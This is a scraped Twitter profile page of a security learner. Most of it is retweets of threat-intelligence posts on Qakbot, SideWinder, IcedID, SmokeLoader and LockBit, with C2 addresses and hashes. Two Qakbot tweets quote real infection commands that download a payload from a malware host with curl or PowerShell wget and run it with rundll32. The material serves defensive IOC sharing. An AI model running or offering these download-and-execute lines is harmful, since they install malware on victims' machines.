null

@random_0_9

Phishing | VAPT | Red Team| Hacker Cypto Learner OSCP

earth

Joined December 2021

475 Following

164 Followers

143 Posts

random_0_9 retweeted

Cryptolaemus @Cryptolaemus1

almost 3 years ago

#Qakbot - obama267 - .pdf > .zip > curl > .dll wscript.exe Calculation-of-costs.js cmd.exe /c mkdir C:\Poliset\Nolser & curl https://skagnechri.]com/0.29.dat --output C:\Poliset\Nolser\file.OOCCXX rundll32 C:\Poliset\Nolser\file.OOCCXX,menu IOC's https://t.co/e8zTrUuCY0

$Cryptolaemus1's tweet photo. #Qakbot - obama267 - .pdf > .zip > curl > .dll wscript.exe Calculation-of-costs.js cmd.exe /c mkdir C:\Poliset\Nolser & curl https://skagnechri.]com/0.29.dat --output C:\Poliset\Nolser\file.OOCCXX rundll32 C:\Poliset\Nolser\file.OOCCXX,menu IOC's https://t.co/e8zTrUuCY0 https://t.co/RH3exkO9l7$

103

34K

random_0_9 retweeted

ThreatBook @ThreatBookLabs

about 3 years ago

A New IOC of #sidewinder #APT we discovered on 19th May. Keep tracking for more #sidewinder intelligence😃. https://t.co/YwFgQtq0qs Check it out: https://t.co/eLrIcVDWZY #ThreatHunting #ThreatIntelligence #threats #infosec #cybersecurity #cybercrime #SOC #CTI

ThreatBookLabs's tweet photo. A New IOC of #sidewinder #APT we discovered on 19th May. Keep tracking for more #sidewinder intelligence😃.

https://t.co/YwFgQtq0qs

Check it out:
https://t.co/eLrIcVDWZY

#ThreatHunting #ThreatIntelligence #threats #infosec #cybersecurity #cybercrime #SOC #CTI https://t.co/A1D2AkGQM9

random_0_9 retweeted

Cryptolaemus @Cryptolaemus1

about 3 years ago

#Qakbot - obama248 - .xhtml > .wsf > ps > .dll wscript.exe AprilINV(f3354).wsf powershell.exe -ENC $Muckhole = ("http://45.66.248.25/vodka.dat") foreach ($Hydro in $Muckhole) {try {wget $Hydro -O $env:TEMP\vodka rundll32 $env:TEMP\vodka,X555 IOC's https://t.co/DnQjWgidxm

$Cryptolaemus1's tweet photo. #Qakbot - obama248 - .xhtml > .wsf > ps > .dll wscript.exe AprilINV(f3354).wsf powershell.exe -ENC $Muckhole = ("http://45.66.248.25/vodka.dat") foreach ($Hydro in $Muckhole) {try {wget $Hydro -O $env:TEMP\vodka rundll32 $env:TEMP\vodka,X555 IOC's https://t.co/DnQjWgidxm https://t.co/tEvpg1GuMs$

34K

random_0_9 retweeted

Gr@ve_Rose @Grave_Rose

about 3 years ago

At Starbucks today when a guy went to the washroom for about four minutes: - Bag left - Phone left - Laptop unlocked - RDP'd into a server - Code open Don't be this guy. #opsec #infosec #fail

Grave_Rose's tweet photo. At Starbucks today when a guy went to the washroom for about four minutes:

- Bag left
- Phone left
- Laptop unlocked
- RDP'd into a server
- Code open

Don't be this guy.

#opsec #infosec #fail https://t.co/vl4UQKeADa

706

118

109K

Who to follow

External Penetration Tester

mocokoco!

@mocokoco2

Always learning , Always growing . GSEC |GCIH|GCIA and GCFA Certified , IT Support, OSINT ,College student , Cybsec noob. old acc @mocokoco1 !

null @random_0_9

about 3 years ago

@brkoduru nicely explained

122

random_0_9 retweeted

Bhargav koduru @brkoduru

about 3 years ago

Here's my blog on #Qakbot malware with threat detections using #osquery Qakbot seen in below campaigns: ⛔️OneNote Campaign ⛔️WSF Campaign ⛔️HTML Smuggling Campaign Blog: https://t.co/mx6CHbYobm #threatintelligence #malware #threathunting #DFIR

151

18K

null @random_0_9

about 3 years ago

#smokeloader tread based on the targeting country

random_0_9 retweeted

xRY0D4N @ryodan0x

about 3 years ago

#SmokeLoader unpacking with x64dbg Yara rule to detect Smoke loader: https://t.co/5VAOnHrqKQ Sample: https://t.co/y40zdeYUYz

random_0_9 retweeted

sicehice @sicehice

about 3 years ago

#opendir hosting various tunnelers #ligolo #quic #fastreverseproxy #bore #chisel and #phonyc2 91.235.234[.]130:8000 PhonyC2: 91.235.234[.]130:443 Previously observed #Meterpreter C2 from .bash_history: 194.61.121[.]86:8443 Zip of PhonyC2: 5dd7c5c8dfc1f513fe93aa775cbde6f1

sicehice's tweet photo. #opendir hosting various tunnelers #ligolo #quic #fastreverseproxy #bore #chisel and #phonyc2

91.235.234[.]130:8000

PhonyC2: 91.235.234[.]130:443

Previously observed #Meterpreter C2 from .bash_history: 194.61.121[.]86:8443

Zip of PhonyC2: 5dd7c5c8dfc1f513fe93aa775cbde6f1 https://t.co/VssFNa3FIh

null @random_0_9

about 3 years ago

@ryodan0x share the email header if possible

null @random_0_9

about 3 years ago

@Jrod_R87 best of luck

null @random_0_9

about 3 years ago

@josh_penny @sangamcse

111

random_0_9 retweeted

Joshua Penny @josh_penny

about 3 years ago

#Donot, linked to 🇮🇳#India, targets specific countries including 🇧🇩🇱🇰🇵🇰. They've expanded to embassies in the US and Europe, using "yty" #malware to attack Mil & Gov orgs. Despite being considered "low" in sophistication, they persist until they succeed. #APT IPs & Domains 👇👇

null @random_0_9

about 3 years ago

@fuyinglab this file is not in VT

random_0_9 retweeted

FuYingLab @fuyinglab

about 3 years ago

A new type of #Botnet called #Komorebi is spreading quickly. #ip：91.239.100.100 #Komorebi-init #Domorebi #hash：19691fed2a086ca0aa17c4b38434c433

fuyinglab's tweet photo. A new type of #Botnet called #Komorebi is spreading quickly.
#ip：91.239.100.100
#Komorebi-init
#Domorebi
#hash：19691fed2a086ca0aa17c4b38434c433 https://t.co/O98GfMLEYb

901

random_0_9 retweeted

Sangam Pradhan @sangamcse

about 3 years ago

#Zeroday in #iPhone and #Android https://t.co/25uQ5fFau2 #cyberattack #malware #Pentesting

117

random_0_9 retweeted

Sangam Pradhan @sangamcse

about 3 years ago

never use freevpn

109

random_0_9 retweeted

Dominic Alvieri

@AlvieriD

about 3 years ago

LockBit just reposted 9 companies ( [+] 2 new )all to leak within 24 hours except the Government of Medellín, Columbia which is set to leak in about 40 minutes. /medellin.gov.co #cybersecurity #infosec #lockbit

AlvieriD's tweet photo. LockBit just reposted 9 companies ( [+] 2 new )all to leak within 24 hours except the Government of Medellín, Columbia which is set to leak in about 40 minutes.

/medellin.gov.co

#cybersecurity #infosec #lockbit https://t.co/PBLl3PVwv1

random_0_9 retweeted

Arda Büyükkaya

@WhichbufferArda

over 3 years ago

New Icedid Malware campaign Phishing Email > Encrypted ZIP > ISO image > LNK > DLL execution via Rundll32.exe f3a9b733cb33c4d257589e70c8d9cf4b5136cb3932bce2ea1b31bc9d5b06a5ae C2: trbiriumpa[.]com Unpacked Sample -> b1566f9c7ffa839554b96575e2a34ea79416f03df75b5048f561e96808975555

WhichbufferArda's tweet photo. New Icedid Malware campaign
Phishing Email > Encrypted ZIP > ISO image > LNK > DLL execution via Rundll32.exe
f3a9b733cb33c4d257589e70c8d9cf4b5136cb3932bce2ea1b31bc9d5b06a5ae
C2: trbiriumpa[.]com
Unpacked Sample -> b1566f9c7ffa839554b96575e2a34ea79416f03df75b5048f561e96808975555 https://t.co/COLN3TPoKM

17K

random_0_9 retweeted

t3ft3lb @t3ft3lb

over 3 years ago

#APT #SideWinder zip -> lnk -> hta ZIP MD5: e5ea6fd2e0f6f546b5842cd9d4a45628 LNK MD5: 567e1394ecfa630a350f5014ed1ae229 URL: https://mail.tsinghua[.]institute/3206/1/25395/2/0/1/1863616521/3DIm0LGMztTur2KVczxFjB36rLfwnHf9DwWAo2oI/files-5b71f8ef/hta @Tsinghua_Uni could be a target

null

@random_0_9

Who to follow

Last Seen Users on Sotwe

Trends for you

Most Popular Users